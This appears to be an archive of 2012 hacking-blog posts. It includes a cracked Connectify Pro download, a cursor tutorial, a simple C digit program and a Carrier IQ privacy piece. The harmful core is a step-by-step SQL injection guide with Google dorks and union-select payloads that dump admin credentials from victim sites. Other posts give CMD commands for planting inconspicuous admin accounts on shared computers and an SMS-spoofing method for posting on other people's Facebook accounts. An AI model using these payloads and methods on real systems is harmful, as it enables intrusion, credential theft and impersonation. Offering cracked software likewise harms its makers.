25 February 2012

Connectify Pro v3.25 Full Patch [Mediafire Software]

Connectify Pro v3.25 Full Patch [Mediafire Software]


Introducing Connectify 3.2! Whether you’re a new user or a dedicated PRO, the newest version of Connectify includes improvements and updates that will guarantee an enhanced experience for each one. Connectify 3.2 users will gain access to brand new Connectify Support Center, complete with an updated Help menu and Knowledge Base. Upgrade to PRO and use Connectify as a wired Ethernet Router to get Ethernet-based devices onto Wi-Fi or 3G networks. Now you can dust off that old Xbox 360, and get it onto your home or school Wi-Fi network! PRO users can also share iTunes through connected computers with integrated Apple Bonjour Support. All users will also be able to enjoy extensive interface improvements and bug-fixes, making Connectify 3.2 the most feature-rich and stable release to-date!

Features

  1. Share Wi-Fi from 3G/4G Networks – Connectify Pro now supports sharing Internet from 3G/4G cards in addition to a wide variety of other USB cards and dongles 
  2. “Scannify” Service Discovery – Connectify Pro will automatically scan your network for available shared folders or drives, web servers, and other remote services 
  3. AutoInternet Selection – When set to “Automatic,” Connectify Pro intelligently chooses which Internet connection to share and makes necessary configuration changes to your hotspot 
  4. Fully Customizable SSID – Name your hotspot whatever you want! Connectify Lite requires your hotspot name to start with “Connectify-” 
  5. Support for Windows XP and Windows Vista – Ad-Hoc Mode only.
Download Link : Mediafire

How to make your Own Cursor

Hi Friends,

In this tutorial i will tell you how can can make your own designed cursor.

Designing a cursor is very easy it just requires a software , a head with a brain in it and my help


Steps :

1. First of all you need to download and install a software named IconArt you can google it and download it from some where on the net.

2. Now Open IconArt Software and draw there anything you like...

3. When you finished the design, save it by going to File> Save frame as Cursor.

4. Now time to apply this new Cursor as your mouse Pointer. For this Go to Contol Pannel> Mouse> Pointers> Browse Cursor that you have made> then Click OK.... and see its done!!!!!


5.With the same Above Procedure you can also change Another Mouse Pointers also For eg: Help Select, Working in Background, Busy etc....


 for any further information leave comments below..........

Write a program for a 5 digit no to print a new number by adding one to each of its digits

void main()
{
float a,b,c,d,e,t,s;
int a1,b1,c1,d1,e1,a2,b2,c2,d2,e2;
printf("\nInput a 5 digit number");
scanf("%f",&t);

a=t/10000.0;
a1=a;
b=(t-(a1*10000.0))/1000;
b1=b;
c=(t-(a1*10000.0)-(b1*1000))/100;
c1=c;
d=(t-(a1*10000.0)-(b1*1000)-(c1*100))/10;
d1=d;
e=(t-(a1*10000.0)-(b1*1000)-(c1*100)-(d1*10))/1;
e1=e;


a2=a1+1;
b2=b1+1;
c2=c1+1;
d2=d1+1;
e2=e1+1;

if (a2==10)
a2=0;
if (b2==10)
b2=0;
if (c2==10)
c2=0;
if (d2==10)
d2=0;
if (e2==10)
e2=0;


s=(a2*10000.0)+(b2*1000.0)+(c2*100.0)+(d2*10.0)+(e2);


printf("\nThe required result is %f",s);
}

22 February 2012

Step By Step Guide For - Hacking Website Using SQL Injection

Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.victimsite.com/index.php?id=2'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls .

or you can try some software for that like haviji which is on my website too ( cracked version )


Note: This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing is.

If you want more such articles than stay updated by joining us on our facebook page.

13 February 2012

Adding / Modifying User Accounts In Windows Via "CMD"

Hello guys! Today i will show you some of the cool CMD tricks. If you don't know  how to launch CMD then go to Start>Run and type there CMD and hit enter.


 
So a command promt window will appear. Like shown above

So now you have CMD and you can add a new user by command below:

C:>net user username /ADD
Where username is the name of your new account. And remember, try and make it look inconspicuous, then they’ll just think its a student who really is at school, when really, the person doesn’t EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD
Where password is the password you want to have. So for instance the above would create an account called ‘username’, with the password being ‘password’. The below would have a username of ‘Usman’ and a password of ‘LULX’

C:>net user Usman LULX /ADD
Right then, now that we can create accounts, let’s delete them:)
C:>net user Usman /DELETE
This will delete poor Usman's acount With the help of CMD.


Let’s give you admin priveleges:)
C:>net localgroup administrator Usman /ADD
This will make Usman an admin. Remember that some places or computers may not call their admins ‘adminstrator’ and so you need to find out the name of the local group they belong to.
You can list all the localgroups by typing
C:>net localgroup
Running .exe files you can’t usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk. :D

Hope this article helped you somehow. If you liked it then subscribe to us to remain updated.

Your own android phone is spying on you

android spy
In this post I am going to reveal a fact which I think that most of the users of smart phones loaded with android don’t even know. As the technology is progressing the common user is technically ignoring the practical aspect of any thing which he is using. Like he doesn’t know that after clicking this link received in the email what is going to happen? whether should I check that isn’t there any viral attack connected to it! Privacy of content is for every individual on this earth and what will you feel if you come to know that your all activities are being logged and can be used against you in worst cases. Surely! you won’t like this specially in case of your cell phone “A smart phone” which you buy to contact to your loved ones in a better way and with a better interface. Lets talk about a software in the Android which is automatically spying on you without your consent.

How: Your Android phone is being monitored:

Recently! a developer at android revealed that in your cell phone a built in application is present which is capable to log every activity of you done in your cell phone. In this case you may think that how actually this data is being sent to the application developers and the related companies of the cell phones for the security reasons. Well, what a cell needs it a network and if this is not present then in offline mode only a Wi-Fi network can send the whole logs. Check out the video made by Eckhart to reveal the truth about this software named as Carrier IQ.

This will let you know that before calling anyone you cell phone first stores and sends the log of the number of the person whom you are calling.

What: Is this software Carrier IQ:

According to the Carrier IQ official notes I came to know that according to them its been created to make the company well aware that what there network and OS is doing with the user, Whether he is happy with it or else there are some bugs appearing out there to embarrass him. According to them:
With Carrier IQ they do. Carrier IQ’s Mobile Service Intelligence solution eliminates guesswork by automatically providing accurate, real-time data direct from the source – your customers' handsets. Our powerful platform aggregates, analyzes and delivers that data via easy-to-use web applications that help wireless carriers make smart business decisions.
But its case sensitive, according to the Eckhart, as he showed that even messages were also being logged by this built in software. Also exactly one might think that SSL traffic is safe, but if you do think bit deeper you will come to know that whenever you are going to write some sensitive data then it surely goes through a secure tunnel but what? Its hijacked earlier because it been uploaded to the site where SSL is enabled by your very own Smart handset Smile with tongue out

Disabling and Deleting Carrier IQ out of your device:

Well! personally I didn’t got a way easy for a noob to delete that program by just tap of a hand over “Uninstall” from a smartphone. One way I got is this that you root you phone and get a custom Android firmware coded by the code provided by the Google. You can get many guides related to this that how can we root android smart phone and can install our own ROM, Well the new ROM must be free of the Carrier IQ software, make it sure, that’s why I recommended to get self coded firmware (AOSP Like Cynogenmode) released over internet. Hope! not much long, I will post about how to root android smartphone. All of the above means don’t use carrier modified ROM’s.

Detecting Carrier IQ in your smart phone:

One way has been described by Eckhart and which is by using Eckhart’s application. Trevor Eckhart’s Logging Test App v7 found on XDA, gives the user access to perform “CIQ checks” which will simply check if the application is installed on your device.

[Source of some information: Internet and Carrier ICQ Official site, Rest are tagged]

09 February 2012

Hack Facebook Status by SMS spoofing

Hii Friends, I had posted about “How to hack Gmail in my earlier article & today I am again going to share one more trick to Hack Facebook Status by SMS Spoofing. By using this trick you can change the status of your friends in facebook.



How to Hack Facebook Status by SMS Spoofing????

1.   Goto the site www.smsglobal.com and click on the Sign Up option..


2.   Now, Fill all detail & its important to fill your valid mobile no. & email because password on it.


3.   After you Successfully completed the registration, you will receive a sms on your number. Just use that password and your Username to login. After you successfully login, you will see a similar page. Click on the ‘Send SMS to Number’ option from the Left pane.


4.   The First Textbox is for Receiver’s number. Just insert the number which is used to update the status or comment on Facebook through mobile. This number is Country specific.


For e.g : In India, its 919232232665.

The 91 is the Country Code and the remaing 9232232665 is the real number.

So just write your Country specific Facebook Number for Facebook Mobile.



5.   The Second Textbox is for Sender’s Number. Just write the Mobile number of the Victim who have Activated Facebook Mobile.

For e.g : Here its, 911234567890. Again, the 91 is for Country Code and the remaining is the Victim’s 10 digit Mobile number.

6.   Leave the Message Template option as it is.

7.   Write the Message you want to write in the Status of Victim’s Profile. Sometimes, it may take around a minute or 2, so just wait and watch.

Some Important Points To Remember:-

1.   The Sender’s Number (Facebook Mobile Number) and the Receiver’s Number (Victim’s Number), should be Preceded by the Country Code and then the Number.

2.   WWW.SMSGLOBAL.COM allows only 25 SMS per Registration. So, as long as you have more Mobile Number to receive Password on it, You can keep trying.

3.   This Trick requires the Victim to have Facebook activated on Mobile (Facebook via Mobile). If the Victim has not activated it, the Method is Invain !!


Check for the ‘Info’ Option in Profile of the Person you want to victimize. If the ‘Info’ contains the Phone Number, the Chances are high that he/she may have activated the Facebook Mobile. So, Just Try Your Luck !!!

Or

Just Paste the Following Link in your Address bar to find out Mobile numbers of all the Friends in your List !!!


Got problems while posting,..then write your problem in comments bellow.

Enjoy Friends...........................


Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.